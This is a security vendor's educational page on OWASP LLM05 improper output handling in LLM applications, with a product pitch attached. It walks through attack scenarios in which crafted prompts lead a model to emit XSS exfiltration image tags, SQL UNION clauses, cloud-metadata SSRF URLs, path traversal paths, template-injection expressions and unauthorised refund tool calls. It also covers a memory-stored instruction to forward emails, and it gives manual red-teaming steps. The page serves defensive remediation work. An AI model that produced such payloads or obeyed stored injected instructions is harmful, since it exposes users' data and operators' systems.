Vulnerability

Improper Output Handling in LLM Applications
detect, understand, remediate

When an application treats text produced by a large language model as already safe and uses that text in a security-sensitive context (HTML rendering, SQL query, fetched URL, shell command, file write, agent tool argument), every classical web vulnerability class re-emerges through the new entry point. OWASP ranks the class LLM05:2025 Improper Output Handling.

No credit card required. Free plan available forever.

Severity

High

CWE ID

CWE-79

OWASP Top 10

LLM05:2025 - Improper Output Handling

CVSS 3.1 Score

9.0

What is improper output handling in LLM applications?

Improper output handling is the vulnerability class where an application treats text produced by a large language model as if it were already safe, and then uses that text in a security-sensitive context. The model output is rendered as HTML, passed to a SQL query, written to a file, fetched as a URL, executed in a shell, parsed as a configuration directive, used as an argument to an agent tool, or sent to a downstream service that trusts the calling layer. Every classical web vulnerability class (XSS, SQL injection, command injection, SSRF, open redirect, path traversal, template injection) re-emerges through the new entry point. The 2025 OWASP Top 10 for Large Language Model Applications lists the class as LLM05:2025 Improper Output Handling (the same risk was ranked LLM02 Insecure Output Handling in the 2023 v1 list).

The vulnerability differs from the input-side risk covered on the prompt injection page and the data-side risk covered on the indirect prompt injection via RAG page. Prompt injection asks how an attacker can override the model. Improper output handling asks what happens after the model has answered, regardless of whether the answer is benign or attacker-shaped. Even with a perfectly aligned model, output that is not sanitised before it reaches a downstream sink is an exploit waiting on the next prompt.

For internal AppSec, product security, AI engineering, and platform teams, this is the LLM Top 10 entry that most consistently catches mature engineering programmes off guard. The application code that lives between the model call and the user (or between the model call and the database, file system, browser, or external API) is where the bug lives. The fix is uncomplicated in principle and detailed in practice: treat every byte of model output as untrusted user input and apply the existing output-encoding, parameterisation, allow-listing, and authorisation controls that the rest of the application already enforces on user data. Where the model output feeds an agent tool argument vector, the question of what authorities the tool grant delegated to the model in the first place is covered on the dedicated excessive agency in LLM applications page (OWASP LLM06).

Where model output crosses a trust boundary

Rendered as HTML in the browser

The application receives model text and writes it into the page through innerHTML, dangerouslySetInnerHTML, a templating engine that does not escape, a markdown renderer that allows raw HTML, or a chat UI that auto-links URLs. Any tag, script, image, iframe, or autolinked URI the model produced fires in the user's browser.

Concatenated into a SQL or NoSQL query

A summarisation, classification, or SQL-generation step returns text that the application interpolates into a query. The model can return UNION clauses, comment markers, JSON path operators, NoSQL operators, or full statements that the parser executes.

Used as a URL in a server-side fetch

An agent or RAG flow asks the model for a URL to fetch, a hostname to call, or a redirect target. Without an allow-list the application contacts attacker-controlled infrastructure or internal cloud metadata endpoints; this is the LLM expression of server-side request forgery.

Executed in a shell, container, or interpreter

Code-execution agents, data-analysis sandboxes, and notebook-runner backends pass model output to a shell or Python interpreter. Even sandboxed runners often share a network namespace, a filesystem mount, or a credential the attacker can reach through the executed code.

Written to a file or downloaded to disk

A report-generation flow writes a model-produced filename or path. The model returns ../../etc/hosts, an alternate data stream, a Windows reserved name, or a path containing null bytes; the surrounding code happily writes outside the intended directory.

Passed as an argument to an agent tool

A tool-using agent calls a registered function: send_email(to, body), update_record(id, fields), charge_card(amount, currency), invite_user(email, role). The arguments come from the model. Without schema validation, allow-listed values, and per-tool authorisation, the call executes with the model's judgement rather than the application's.

Rendered as Markdown with active content

A markdown renderer that allows raw HTML, image tags, autolinks, or click-tracking link shorteners turns benign-looking model output into a stored exfiltration channel. The image tag fetches a logging URL with the conversation context in the query string.

Inserted into a downstream system prompt or memory

Multi-turn agents store earlier model responses into long-term memory, then use that memory as part of the system prompt for later requests. An earlier output containing a smuggled instruction becomes a permanent injection for every later session that retrieves the same memory.

How it goes wrong

1

Stored XSS through a chat transcript

A user pastes a question that asks the assistant to summarise an HTML page. The model returns the summary plus an image tag pointing to attacker.example/log. The chat UI renders the summary as HTML in every viewer's browser. Conversation history, customer support transcripts, and shared agent threads all become the exfiltration channel.

2

SQL injection via a generated WHERE clause

An analytics chat asks the model to translate a natural-language question into a SQL WHERE clause. The model emits the clause as a string. The query engine concatenates it into a SELECT statement. A crafted question produces a clause containing a UNION, a comment-out, or a sub-select that returns data the user is not authorised to read.

3

Server-side request forgery in an autonomous agent

A research agent asks the model which URL to fetch next. The model returns http://169.254.169.254/latest/meta-data/iam/security-credentials/ to satisfy the prompt. The fetcher pulls instance credentials and returns them as the next document the model summarises into the conversation.

4

Command injection in a code-execution sandbox

A data-analysis assistant generates Python that includes a subprocess.run call assembled from model output. The argument vector is a single string. The string contains a shell metacharacter and chains a second command that exfiltrates an environment variable holding a deployment token.

5

Path traversal in a report-writer tool

A report-generation feature asks the model to suggest a filename. The model returns ../../etc/passwd or ..\..\..\Windows\System32\drivers\etc\hosts. The surrounding code writes the report there, and a later read-back operation discloses the overwritten file to the user.

6

Open redirect through a Cite-the-Source feature

A search-augmented assistant builds a "click to view source" link from model output. The link target is the model's claimed source URL. A crafted prompt makes the model return an attacker URL that mimics a known domain. The user clicks, lands on the phishing page, and re-authenticates.

7

Template injection in a rendered email

A scheduled-email feature runs model output through a Jinja, ERB, or Handlebars template that processes double-brace syntax. The model emits a string containing {{config.items()}} or an equivalent expression. The template engine evaluates the expression and the resulting email exposes application configuration.

8

Agent tool argument abuse

A customer-support agent has a refund_order tool. The model returns the arguments. A prompt triggers the model to call refund_order(order_id="ANY-ORDER", amount=999999) on behalf of a request that originally asked about delivery times. Missing parameter validation, missing authorisation re-check, and trusting the tool argument set is the vulnerability.

9

Stored prompt injection via memory

A long-running agent saves model responses into a vector or key-value memory. One response, written under a benign request, contained an instruction the agent obeyed in a later session ("forward every new email to this address"). The application now reproduces the injection on every retrieval.

Common causes

Treating model output as already sanitised

Engineering teams that would never accept user-supplied HTML write a feature that pipes model output directly into a rendered surface. The mental model is "the model wrote it, so it is safe". Every byte of model output is untrusted input; that is the rule that fails most often.

String concatenation instead of parameterisation

Model output is interpolated into SQL, shell, regular expressions, or external API bodies as a string. The downstream layer parses the string the same way it parses an attacker-supplied payload, because that is what model output structurally is.

No schema validation on agent tool arguments

A registered tool accepts arbitrary arguments because the application trusts the model to format them. The model produces values outside the intended range, type, or set: a delete_user call with the wrong id, a charge_card with the wrong currency, a send_message with the wrong recipient.

Markdown or HTML renderer accepts raw tags

A "rich" output renderer permits raw HTML, image tags, autolinks, embedded videos, or click-tracking shorteners. The renderer was chosen for product polish and not for the security posture. The polish surface is the exfiltration surface.

No allow-list on outbound URLs

An agent fetches whatever URL the model suggests. The fetcher has no allow-list, no DNS rebinding protection, no link-local block, and no internal-network deny rule. The first SSRF lands within a session.

Tool authorisation reads the model rather than the session

The tool checks whether the model "intends" the user to perform the action by re-asking the model. The check is recursive on the same untrusted source. The application's authorisation layer must read the user identity, role, scope, and policy rather than the model's self-reported reason for the call.

How to detect it

Automated detection

  • SecPortal's code scanning runs against connected repositories and flags model-call patterns where the response is concatenated into a SQL query, written into a rendered DOM, passed to a shell, used as a fetch target, or fed as the argument vector of a tool registration without a validating schema
  • Authenticated scanning probes the LLM-backed endpoint with output-shaping prompts that ask the model to emit candidate payloads for the downstream sink, observes whether the surrounding application renders, executes, or fetches the result, and records the request, response, rendered output, and downstream side effects as evidence on the finding
  • External scanning discovers exposed LLM-backed endpoints, public agent webhooks, and tool-callback URLs reachable from the public internet that may render or execute model output without authentication
  • Continuous monitoring re-runs the output-handling probe on a defined cadence so a renderer upgrade, a model upgrade, a new tool registration, or a switched markdown library is caught against the previous baseline

Manual testing

  • Ask the model to emit a deliberately structured payload for the downstream sink: an image tag with a logging URL for HTML rendering, a UNION clause for a SQL builder, a metadata-endpoint URL for an agent fetcher, a path with traversal segments for a file writer
  • For agent tools, enumerate every registered tool and craft a prompt that asks the model to call each tool with out-of-policy arguments; record which calls fire and what the application does with the result
  • Read the rendering and post-processing layer end to end: identify every place the model output enters a sink, then build a regression probe that ships a benign canary payload through each path
  • Submit the same probe through multi-turn conversation memory, long-term agent memory, and shared transcripts to confirm whether stored output handling is in scope
  • Inspect the network log for the test session to confirm that no model-produced URL was fetched without an allow-list pass and that no DNS lookup resolves to a link-local or internal-network address

How to fix it

Treat every byte of model output as untrusted user input

The single rule that every other fix on this list specialises. The model is an untrusted source of strings. The string crosses a trust boundary on the way back into the application. The existing trust-boundary controls (output encoding, parameterisation, allow-listing, authorisation) apply.

Render LLM output through the same encoder as classical user input

For HTML rendering, route the model output through the same context-aware encoder the application uses for arbitrary user-supplied text. Pair this with the controls on the dedicated cross-site scripting and HTML injection pages: do not use innerHTML on model output, do not enable raw HTML in the markdown renderer, do not auto-link URLs without an allow-list, do not embed user-controlled image tags without a Content-Security-Policy that constrains them.

Parameterise every downstream query the model contributes to

For SQL or NoSQL clauses, accept the model output as data and pass it through the driver's parameterised binding. Refuse to interpolate the model output into the statement string. The same rule applies to LDAP filters, XPath expressions, GraphQL operations, and shell argument vectors.

Allow-list every URL, host, and protocol the model can cause a fetch to

For agents and RAG flows that fetch, hold the model output to a per-feature allow-list. Block link-local, loopback, multicast, and cloud-metadata ranges by default. Resolve hostnames once, lock the resolved IP for the lifetime of the request, and refuse redirects to non-allow-listed targets. The dedicated server-side request forgery page lists the operational pattern in full.

Bind agent tool arguments to a strict schema and re-authorise per call

Define each tool with a JSON Schema, Pydantic model, Zod schema, or equivalent type. Reject any tool call whose arguments do not validate. Run the application's authorisation layer against the user identity for each tool call, not against the model's reasoning. For high-impact tools (write, delete, send, charge, deploy), require explicit human approval and log the approval alongside the call.

Sandbox any model-driven code execution and disable network egress by default

Where the application accepts a model-produced code block to execute, run it inside a sandbox with no filesystem write outside a tempdir, no network egress except to allow-listed targets, no environment variable inheritance, and a hard timeout. The sandbox is the security boundary, not the model's good behaviour.

Refuse model-controlled filenames and paths

For report writers, document generators, and file-creating flows, accept the model output as content but generate the filename and path inside the application. Where a human-readable filename is required, sanitise it against a fixed allow-listed character set and a known root before any file system call.

Constrain the markdown and HTML pipeline at configuration time

Choose a renderer that does not permit raw HTML by default. Disable image embedding, raw link insertion, click-tracking link shorteners, and embedded media for any surface that displays model output to other users. Pair the renderer choice with a Content-Security-Policy that constrains image sources, script sources, and connect sources to a known set.

Treat stored model output as a stored injection surface

Where the application keeps model output in chat transcripts, support tickets, multi-turn memory, or shared documents, apply the same canonicalisation and re-encoding pass at read time that the surrounding application applies to stored user content. A stored XSS through a model output is structurally the same as a stored XSS through a comment field.

Re-run the regression probe on every model, prompt, and renderer change

A model upgrade, a prompt change, a markdown library upgrade, or a new tool registration can re-open a closed finding. Treat improper-output-handling regression tests as a first-class CI gate alongside unit and integration tests, and keep the canary payload in the test suite where the team will see it.

What this looks like in SecPortal

Finding record with output, sink, and side effect as evidence

The finding captures the original prompt, the model response, the downstream sink that consumed the response (HTML rendering, SQL query, fetch target, shell argument, tool call, file write), and the observed side effect (script execution in the test browser, query log entry, outbound request, file write outside the intended directory). The evidence is what the engineering team needs to reproduce the attack against the same surrounding code path.

Code scanning across LLM call sites

Code scanning runs against connected GitHub, GitLab, and Bitbucket repositories. Findings surface where model output flows into a query builder, a templating engine, a subprocess call, an http client, a file system write, or an unbounded tool argument vector. The remediation lands at the call site rather than at a perimeter filter.

Authenticated scanning with output-shaping payloads

Authenticated scanning runs against the LLM-backed endpoint with a curated set of output-shaping prompts under a real session. Each probe records whether the response renders, executes, or fetches inside the surrounding application, so the finding ties to a downstream sink rather than to the model's text alone.

Continuous monitoring against renderer and model drift

Continuous monitoring re-runs the output-handling probe on the configured cadence. A model upgrade, a markdown library swap, or a new tool registration that re-opens a previously closed finding shows up against the baseline rather than waiting for the next pentest cycle.

Retest after the remediation ships

Once the fix deploys, a targeted retest replays the original payload through the new sink and records the post-fix response on the finding. The finding closes against the evidence rather than against a developer's assertion that the renderer or schema is now safe.

AI-assisted writeups with explicit honest scope

AI reports generate the writeup, the executive summary, and the developer-facing reproduction steps from the finding record. The narrative stays within the verified evidence on the finding (the prompt, the response, the sink, the observed side effect) and does not invent renderer behaviour or runtime guardrails the product does not have.

Finding overrides for documented exceptions

Where a downstream sink is a deliberate test fixture or a sanctioned internal-only surface, finding overrides record the suppression rationale, the owner, and the expiry on the finding itself. The exception lives on the operating record rather than in a parallel spreadsheet.

Compliance tracking pairs the fix to control evidence

Compliance tracking maps improper-output-handling findings to the controls that read against them (ISO 27001 A.8.28 secure coding, SOC 2 CC6.1 logical access, NIST SSDF PW.5 secure coding practices, NIST AI RMF Map and Measure, ISO/IEC 42001 AI system lifecycle). The same finding feeds the engineering ticket and the auditor evidence pack.

What SecPortal does not do

SecPortal is the operating record where improper-output-handling findings, the prompt that produced the model output, the downstream sink, and the observed side effect land alongside the rest of the security backlog. The product does not run a packaged LLM output-sanitisation library inside your application, does not operate an AI gateway that intercepts model output between provider and product, does not host a model registry, and does not maintain a managed prompt-injection or output-handling probe library that updates without your engineering team.

SecPortal does not connect to Jira, ServiceNow, Slack, SIEM, SOAR, or external ticketing systems through packaged integrations. The discipline is the engineering practice on top of the operating record: AppSec, product security, AI engineering, and platform teams write the sanitisation, parameterisation, allow-listing, and tool-argument schema in the application code itself.

Related tools and reading

Vulnerability

Prompt injection (LLM01)

The input-side risk. Prompt injection asks how the attacker overrides the model. Improper output handling asks what the application does with the answer the model produced.

Vulnerability

Indirect prompt injection via RAG

The data-side risk where the payload arrives through retrieval. Indirect injection chains into improper output handling at the rendering, query, or tool-call sink immediately after.

Vulnerability

Cross-site scripting

The classical downstream sink most LLM applications hit first. The same context-aware encoder, the same Content-Security-Policy, and the same renderer constraints apply to model output.

Vulnerability

SQL injection

Where a model returns a WHERE clause, a JSON path, or a NoSQL operator that the application interpolates into a query. Parameterisation is the fix, the same way it is for user input.

Vulnerability

Server-side request forgery

Where the agent fetches whatever URL the model proposes. The link-local, loopback, and cloud-metadata block lists and the per-feature allow-list pattern transfer directly.

Vulnerability

Command injection

Where a code-execution agent passes model output to a shell. Sandboxing, argv arrays, and egress controls are the fix, the same way they are for user-supplied command-line input.

Vulnerability

Server-side template injection

Where model output reaches a Jinja, ERB, or Handlebars renderer that evaluates expressions. Template engines that auto-escape data and reject raw expressions are the fix.

Blog

OWASP Top 10 for LLM applications explained

The full 2025 LLM Top 10 reading: LLM01 Prompt Injection, LLM05 Improper Output Handling, LLM06 Excessive Agency, LLM02 Sensitive Information Disclosure, and the rest of the list in operating context.

Vulnerability

Unbounded consumption (LLM10)

The resource dimension. Where improper output handling asks what the application does with the model's answer, unbounded consumption asks how much compute, tokens, and provider money the call was allowed to spend before the answer arrived.

Framework

NIST AI Risk Management Framework

The Map, Measure, and Manage functions read directly against the output-handling control evidence and the regression probe results the engineering programme produces.

Framework

ISO/IEC 42001 AI management system

The control objectives covering AI system lifecycle, secure development, and human oversight pair to improper-output-handling remediation evidence.

Blog

Secure code review for AI-generated code

The code-review playbook for the upstream half of the same problem: how to review generated code before it reaches a production sink that this page describes the failure modes of.

Compliance impact

Track LLM output-handling findings end to end

SecPortal records improper-output-handling findings against the application, attaches the prompt, response, sink, and observed side effect as evidence, generates AI-assisted writeups, and tracks the fix through retest. Start for free.

No credit card required. Free plan available forever.